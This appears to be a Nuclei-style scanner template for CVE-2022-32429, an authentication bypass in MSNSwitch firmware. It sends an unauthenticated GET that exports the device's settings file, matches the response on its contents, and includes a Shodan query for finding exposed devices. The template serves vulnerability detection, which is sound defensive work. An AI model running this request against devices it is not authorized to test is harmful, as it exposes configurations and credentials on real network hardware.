56 lines
2.0 KiB
YAML
56 lines
2.0 KiB
YAML
id: CVE-2022-32429
|
|
|
|
info:
|
|
name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
|
|
author: theabhinavgaur
|
|
severity: critical
|
|
description: |
|
|
MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
|
|
remediation: |
|
|
Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
|
|
- https://elifulkerson.com/CVE-2022-32429/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
|
|
- http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-32429
|
|
cwe-id: CWE-287
|
|
epss-score: 0.0395
|
|
epss-percentile: 0.91011
|
|
cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: megatech
|
|
product: msnswitch_firmware
|
|
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
|
|
tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "SSID1"
|
|
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- 'filename="Settings(.*).dat'
|
|
- 'application/octet-stream'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022018a92fc6da3af95543e33ca7510cd458f6ee5c5dc0b988fa62abb03cd1a9b9430221009384edd2be043d50e9666964f4c3c26e057c8ad66dc653c74e169b5e8b59f0f7:922c64590222798bb761d5b6d8e72950
|